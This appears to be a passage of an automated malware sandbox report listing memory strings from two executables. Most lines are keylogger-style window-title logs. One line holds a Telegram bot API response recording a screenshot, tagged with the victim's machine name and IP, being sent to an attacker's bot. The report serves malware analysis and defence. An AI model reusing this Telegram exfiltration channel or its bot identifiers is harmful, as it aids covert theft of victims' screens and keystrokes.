                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:15]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 46:48]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:06]<<Program Manager
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 14:47:10]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 08]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:51]<<Program Manager>>te
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.00000000011F8000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FBE000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3409239183.00000000080D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:50]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:04]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:51]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:51]<<Program Manager>>.
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:40]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageroardop\oxs
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:15]<<Program Manager>>*
                    Source: XgbXowhljC.exe, 0000000E.00000002.3409239183.00000000080D0000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3408140983.0000000004098000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3408679084.00000000041D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:48:14]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:41]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:32]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:06]<<Program ManagerM
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:13]<<Program Manager>>l
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:46]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 14:46:44]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:57]<<Program Manager
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 44]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: BC:\Users\user\AppData\Local\CEF[14:46:27]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.0000000004098000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQUWDdOhIko2D
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:48]<<Program Manager>>i
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:50]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:43]<<Program Manager>>)
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:10]<<Program Manager>>%D
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:29]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F06000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:51]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ue,"result":{"message_id":3552,"from":{"id":7725030292,"is_bot":true,"first_name":"obilogs","username":"obilogssbot"},"chat":{"id":6732456666,"first_name":"Oba1","username":"Obdon1","type":"private"},"date":1732736895,"document":{"file_name":"ScreenshotnEqzxdUQ.BMP","mime_type":"image/bmp","file_id":"BQACAgQAAxkDAAIN4GdHd39kWjj4a6G2lFW9fiwQws6zAAI_FgACKNA5UmPrLYzl8sr4NgQ","file_unique_id":"AgADPxYAAijQOVI","file_size":3932214},"caption":"DC-SC:::user-PC\\user\\8.46.123.228","caption_entities":[{"offset":25,"length":12,"type":"url"}]}}<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzplates\user-PC-user\<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:45]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :47:10]<<Program Manager
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :06]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerF062011ko2
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:06]<<Program Manager>>.iniXK
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:52]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:47]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\system32\wbem\wmiutils.dll<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerQUWDdOhIko2DD
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:55]<<Program Manager>>#
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:42]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:31]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001277000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:49]<<Program Managerf$
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:43]<<Program Manager5s
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 47:11]<<Program Manager>f,
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [4:47:11]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 14:46:48]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :46:43]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:51]<<Program Managerl(a)),I(a,b|1))}
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:49]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerrkdvWWko2
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:41]<<Program Manager*
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.00000000011F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:51]<<Program Manager>>p
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:53]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 46:39]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:44]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :46:28]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:27]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:43]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:52]<<Program Manager>l
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 14:46:29]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7:13]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:45]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:52]<<Program Manager#
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:57Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:10]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:08]<<Program Manager>>X
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:54]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:49<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:48:14]<<Program Manager>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:27]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:11]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:08]<<Program Manager>>q
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:40Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:55]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 47:07]<<Program Manager>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:09]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:50]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:06]<<Program Manager>>v
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:53]<<Program Manager>>q
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:46]<<Program Manager>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052F0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:56]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:49]<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3409059058.00000000052F0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:12]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.00000000011F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FC:\Users\user\AppData\Local\CommsBte}!\\<<Program Manager
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerogram Manager=`,
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.0000000001259000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:53]<<Program Manager>>v
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:32]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:40]<<Program ManagerI}
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:48:14Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:28]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:46]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:08]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:13]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--4]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:31]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3405115828.000000000128F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:40]<<Program Manager>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:48]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3407301740.0000000003FB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:11]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6:42]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 14:46:43]<<Program Manager>>
                    Source: XgbXowhljC.exe, 0000000E.00000002.3408140983.00000000040A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 28]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E78000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:46:47]<<Program Manager>>
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000F50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:49]<<Program Manager
                    Source: oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003E10000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3404763385.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, oS6KsQIqJxe038Y.exe, 0000000A.00000002.3407506509.0000000003ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [14:47:07]<<Program Manager>>
